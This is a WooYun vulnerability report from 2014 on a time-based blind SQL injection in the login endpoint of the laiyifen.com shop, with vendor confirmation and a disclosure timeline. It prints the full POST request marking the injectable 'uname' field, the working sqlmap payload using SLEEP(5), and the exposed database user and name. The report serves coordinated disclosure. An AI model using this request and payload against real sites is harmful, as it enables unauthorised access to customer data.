当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083889

漏洞标题:来伊份官方商城某处SQL盲注可致80W+用户数据泄露(第二弹)

相关厂商:laiyifen.com

漏洞作者: pandada

提交时间:2014-11-19 20:02

修复时间:2015-01-03 20:04

公开时间:2015-01-03 20:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-19: 细节已通知厂商并且等待厂商处理中
2014-11-21: 厂商已经确认,细节仅向厂商公开
2014-12-01: 细节向核心白帽子及相关领域专家公开
2014-12-11: 细节向普通白帽子公开
2014-12-21: 细节向实习白帽子公开
2015-01-03: 细节向公众公开

简要描述:

好人做到底,我给你又找到一处盲注。这回能不给我高点分,让我从此不再是路人!

详细说明:

注入点说明:uname是注入点,如图中星号所示

POST /index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.laiyifen.com:80/
Cookie: vary=b0ce119e2261931586e0e8bebe87b1121a94ee60638487365167a950e7783a9a; laiyifen_cookie=553648906.20480.0000; s=4833654e485fd985efdc4b368115d1f4; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1416322579
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
forward=&password=g00dPa%24%24w0rD&uname=*

漏洞证明:

sqlmap identified the following injection points with a total of 778 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: forward=&password=g00dPa$$w0rD&uname=" AND SLEEP(5) AND "IQDW"="IQDW
---
current user: 'laiyifendb@10.3.%.%'
current database: 'laiyifendb'


其他的我就不证明了,参照之前提交的。盲注是慢点,内容肯定是一样的罗。

修复方案:

为了用户数据安全,商家赶紧排查修复。

版权声明:转载请注明来源 pandada@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-21 10:35

厂商回复:

非常感谢pandada兄和乌云的支持,非常感谢!

最新状态:

暂无